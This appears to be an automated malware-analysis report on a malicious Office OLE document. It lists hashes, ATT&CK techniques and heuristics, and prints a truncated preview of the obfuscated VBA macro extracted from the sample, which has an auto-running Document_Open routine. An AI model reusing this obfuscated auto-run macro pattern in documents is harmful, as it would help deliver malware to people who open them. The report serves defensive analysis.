Office (OLE) malware analysis — malicious · 28176759ce4a7abf

MALICIOUS

Office (OLE)

86.4 KB First seen: 2019-02-26

MD5: 17dcd9a3b581211b3e13debe5166a558 SHA-1: 0f03e6aa3306353d20149ea939ac918ef735e339 SHA-256: 28176759ce4a7abfa3ae60780051bc81aa0dd476e162cffe844b6d4fd2d28b3b

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing a Document_Open VBA macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated and truncated, making it difficult to determine its exact function, but it appears to be designed to download and execute a second-stage payload. The presence of the Document_Open macro and the obfuscated VBA code strongly suggests a malicious intent, likely related to phishing or malware delivery.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 88,448 bytes but its declared streams total only 36,250 bytes — 52,198 bytes (59%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11401 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11401 bytes
SHA-256: `7cf83ed6db5ff80a5e3690679d8f8192d599bf66d1d1ae6e826ba5a50a127716`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AzAbPzzdcRLDNV" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If XUjVz > zANPT Then End If If QNQZZi And 10 Then End If If EARCb <= VUctt Then End If If QXaMY <= vzkVNI Then End If If jGbUpR <> 9 Then End If RDuTVEwthQdfDF (GjAdiVpD + LsIUcvdia + ZzKzariVsRs + XYHZSEMn + ifIBBjnB + QBwYloR + jIEhkO + AEQihZsi + ZAuNiHr + fcCXbVro + wNGCaajO + UpvMzRdO) If EvYmu >= OmEXnn Then End If If DMDHzw And uaqOj Then End If If ujSjMM Or IBYqpN Then End If If jwicj <= sVEbz Then End If End Sub Attribute VB_Name = "uOIZYwizLmh" Function GjAdiVpD() If MRpSo And 3 Then End If EJzvnS = "`ja ,S,@ [p[b[q [c[f" + ":[V[62[ [p[7[#[ " + "[P[a`[ S[3" If hzPIW <> aUTZdL Then End If If SwQnF < uFvfDH Then End If RrwwXFiLN = "s[ [u[N%[ [/[" + ";[][ o[C[Z [t[c[" + "N[ d[q[W[ " + "[e[W[V[ [>[H[r[ [x" If iiwAqm Eqv NRhFK Then End If If MSZBBw And 16 Then End If If ACKcc Eqv 19 Then End If pclDiw = "%[C[ [u['[4[ K[)[n" + "[ [g [D[ [g[Wo[ [E" + "[+[ [Uh[m[z[!" + "[YO[z[8[d[r[x[" If PXKlk <= fKfXEl Then End If If zlbdj <> iGKRs Then End If If vqNKKd And Shzhr Then End If iQqZJ = "n[xe[f[([v`" + "[>[4[<[q[Q[H[/" + "[^[?[L&`[X[i" + "[U[z[>[2k[8[" + "NK[>[h[Y[]" If lulRa = kjWmi Then End If If ViuFC And 4 Then End If If ZBzUW > INtsDR Then End If If SNuHm Eqv 12 Then End If jJhtwprD = "[W[^[;%[H[b[ [-,oA" + "o[H[_[3[<[;[8[([>[G`" + "[7[E[?w&['" + """" + "[n" + "['[L[<[!&[^[" If MKpGl Or UGonA Then End If HsfiKwO = "{[ B[pv[j['[#[_[b" + "[Q[>p[q[3[a[H[F[#" + "[H[E[[#[N[b[" + "b[q[z[e[h[Q[v[_[" + "l[^`ss[XO[]k[j" GjAdiVpD = EJzvnS + RrwwXFiLN + pclDiw + iQqZJ + jJhtwprD + HsfiKwO If zmKbk <= kiORMp Then End If If ASLHh <> AFSqZu Then End If If vzPcm And APmZo Then End If If QAwQH Eqv oGNDwK Then End If If WGZiqD > DEABi Then End If If GzQXWj Xor WoObJ Then End If End Function Function LsIUcvdia() If jzLjj >= aqzzW Then End If If hzlmt Or jQDKi Then End If IihITPtntz = "[([a[F[?[A4[8[R[x[4&" + "[g['[;`[:[-[\[w" + "[V[0" + """" + "[n" + """" + "[i[z[![M[A" + "[F[ [)[I[=[)`[$[A[g[" zIDhjbu = "(@[c[a>%[4[c[U[" + "C[y![h[ZB%[c[?O[b[" + "Nk[E[i[t[-[H[f[5['[F" If dGphc = bjnNH Then End If XpFwTGQwF = "[C[4[ [][a[;[f[3" + "[^[J[C[M[l[Q[h" + "[n[ih[4[Pk[e[Z[I[t[" + "BS[U[l[#[:" + "[j[A[z[H[d[+[7" LsIUcvdia = IihITPtntz + zIDhjbu + XpFwTGQwF If bMIKH And 2 Then End If If SFnBl Or 1 Then End If End Function Function ZzKzariVsRs() If ikLKo Or CTHCjK Then End If If ohRmwz Eqv KRuEdB Then End If UfsZzTHuzKT = "i[yk[B[^[b_[" + "+[G[;B[A[M[b[![G[<" + "s[x[dC[b[vk[" + "][Lo[>[T['[qu[D[d" + "[x[D[l[9&[#K[4[D[" If QWGiI >= ZATpm Then End If If qEUAwj > WQcrCq Then End If hdBuwwww = " [6[A[H[0[" + "_[m[q[3[0[p[![h[" + "=[) [Y[N[1" + "k[<[Z[Q[fK[T[/[ [h[" If izoLDD Xor MEStQR Then End If If MmiHkD >= JANqo Then End If sZqwrPLwBw = "N[#g[C[T[^[a[n" + "[I[t[c@[4[\[!z[" + "\[D%)[h[2[e" ZzKzariVsRs = UfsZzTHuzKT + hdBuwwww + sZqwrPLwBw If NUmvI <= 9 Then End If If rTBdSV <> bJGwA Then End If If XHbss <= uFrAiq Then End If If MTjmD >= IuGMDH Then End If End Function Function XYHZSEMn() If GUJVp Or 13 Then End If If ZHwjqT <= alZhF Then End If If zJdiQ Eqv 7 Then End If If OnlfLl Eqv ZoDIs Then End If LoqNfKzWZlj = "[>AB`[2,[ [" + "^[WS[;[b[j[" + "X[9o[*[a[x[l" + "[{[<[T[c[p[]%[" + "8M[LC$" + """" + "[/4[b[" wFvHPPc = "p[Y[M[u[1[([.b[" + "3[zu[+[m[3[Y[" + "$[<[z[r[([m[C" If pkvOTS < fKWHOo Then End If mZitlSAM = "[i[J[Ukd[H[Y[W[" + "B[F$[:[N![_[A[e[([nS" + "[{[$[>[4[ [Yo[6[m" XYHZSEMn = LoqNfKzWZlj + wFvHP ... (truncated)

SHA-256: 7cf83ed6db5ff80a5e3690679d8f8192d599bf66d1d1ae6e826ba5a50a127716

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "AzAbPzzdcRLDNV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If XUjVz > zANPT Then


End If
   If QNQZZi And 10 Then


End If
   If EARCb <= VUctt Then


End If
   If QXaMY <= vzkVNI Then


End If
   If jGbUpR <> 9 Then


End If
RDuTVEwthQdfDF (GjAdiVpD + LsIUcvdia + ZzKzariVsRs + XYHZSEMn + ifIBBjnB + QBwYloR + jIEhkO + AEQihZsi + ZAuNiHr + fcCXbVro + wNGCaajO + UpvMzRdO)
   If EvYmu >= OmEXnn Then


End If
   If DMDHzw And uaqOj Then


End If
   If ujSjMM Or IBYqpN Then


End If
   If jwicj <= sVEbz Then


End If
End Sub


Attribute VB_Name = "uOIZYwizLmh"
Function GjAdiVpD()
If MRpSo And 3 Then


End If
EJzvnS = "`ja ,S,@ [p[b[q [c[f" + ":[V[62[ [p[7[#[ " + "[P[a`[ S[3"
If hzPIW <> aUTZdL Then


End If
   If SwQnF < uFvfDH Then


End If
RrwwXFiLN = "s[ [u[N%[ [/[" + ";[][ o[C[Z [t[c[" + "N[ d[q[W[ " + "[e[W[V[ [>[H[r[ [x"
If iiwAqm Eqv NRhFK Then


End If
   If MSZBBw And 16 Then


End If
   If ACKcc Eqv 19 Then


End If
pclDiw = "%[C[ [u['[4[ K[)[n" + "[ [g [D[ [g[Wo[ [E" + "[+[  [Uh[m[z[!" + "[YO[z[8[d[r[x[*"
If PXKlk <= fKfXEl Then


End If
   If zlbdj <> iGKRs Then


End If
   If vqNKKd And Shzhr Then


End If
iQqZJ = "n[xe[f[([v`" + "[>[4[<[q[Q[H[/" + "[^[?[L&`[X[i" + "[U[z[>[2k[8[" + "NK[>[h[Y[]"
If lulRa = kjWmi Then


End If
   If ViuFC And 4 Then


End If
   If ZBzUW > INtsDR Then


End If
   If SNuHm Eqv 12 Then


End If
jJhtwprD = "[W[^[;%[H[b[ [-,oA" + "o[H[_[3[<[;[8[([>[G`" + "[7[E[?w&['" + """" + "[n" + "['[L[<[!&[^["
If MKpGl Or UGonA Then


End If
HsfiKwO = "{[ B[pv[j['[#[_[b" + "[Q[>p[q[3[a[H[F[#" + "[H[E[*[#[N[b[" + "b[q[z[e[h[Q[v[_[" + "l[^`ss[XO[]k[j"
GjAdiVpD = EJzvnS + RrwwXFiLN + pclDiw + iQqZJ + jJhtwprD + HsfiKwO
   If zmKbk <= kiORMp Then


End If
   If ASLHh <> AFSqZu Then


End If
   If vzPcm And APmZo Then


End If
   If QAwQH Eqv oGNDwK Then


End If
   If WGZiqD > DEABi Then


End If
   If GzQXWj Xor WoObJ Then


End If
End Function
Function LsIUcvdia()
If jzLjj >= aqzzW Then


End If
   If hzlmt Or jQDKi Then


End If
IihITPtntz = "[([a[F[?[A4[8[R[x[4&" + "[g['[;`[:[-[\[w" + "[V[0" + """" + "[n" + """" + "[i[z[![M[A" + "[F[ [)[I[=[)`[$[A[g["
zIDhjbu = "(@[c[a>%[4[c[U[" + "C[y![h[ZB%[c[?O[b[" + "Nk[E[i[t[-[H[f[5['[F"
If dGphc = bjnNH Then


End If
XpFwTGQwF = "[C[4[ [][a[;[f[3" + "[^[J[C[M[l[Q[h" + "[n[ih[4[Pk[e[Z[I[t[" + "BS[U[l[#[:" + "[j[A[z[H[d[+[7"
LsIUcvdia = IihITPtntz + zIDhjbu + XpFwTGQwF
   If bMIKH And 2 Then


End If
   If SFnBl Or 1 Then


End If
End Function
Function ZzKzariVsRs()
If ikLKo Or CTHCjK Then


End If
   If ohRmwz Eqv KRuEdB Then


End If
UfsZzTHuzKT = "i[yk[B[^[b_[" + "+[G[;B[A[M[b[![G[<" + "s[x[dC[b[vk[" + "][Lo[>[T['[qu[D[d" + "[x[D[l[9&[#K[4[D["
If QWGiI >= ZATpm Then


End If
   If qEUAwj > WQcrCq Then


End If
hdBuwwww = " [6[A[H[0[" + "_[m[q[3[0[p[![h[" + "=[) [Y[N[1" + "k[<[Z[Q[fK[T[/[ [h["
If izoLDD Xor MEStQR Then


End If
   If MmiHkD >= JANqo Then


End If
sZqwrPLwBw = "N[#g[C[T[^[a[n" + "[I[t[c@[4[\[!z[" + "\[D%)[h[2[e"
ZzKzariVsRs = UfsZzTHuzKT + hdBuwwww + sZqwrPLwBw
   If NUmvI <= 9 Then


End If
   If rTBdSV <> bJGwA Then


End If
   If XHbss <= uFrAiq Then


End If
   If MTjmD >= IuGMDH Then


End If
End Function
Function XYHZSEMn()
If GUJVp Or 13 Then


End If
   If ZHwjqT <= alZhF Then


End If
   If zJdiQ Eqv 7 Then


End If
   If OnlfLl Eqv ZoDIs Then


End If
LoqNfKzWZlj = "[>AB`[2,[ [" + "^[WS[;[b[j[" + "X[9o[*[a[x[l" + "[{[<[T[c[p[]%[" + "8M[LC$" + """" + "[/4[b["
wFvHPPc = "p[Y[M[u[1[([.b[" + "3[zu[+[m[3[Y[" + "$[<[z[r[([m[C"
If pkvOTS < fKWHOo Then


End If
mZitlSAM = "[i[J[Ukd[H[Y[W[" + "B[F$[:[N![_[A[e[([nS" + "[{[$[>[4[ [Yo[6[m"
XYHZSEMn = LoqNfKzWZlj + wFvHP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.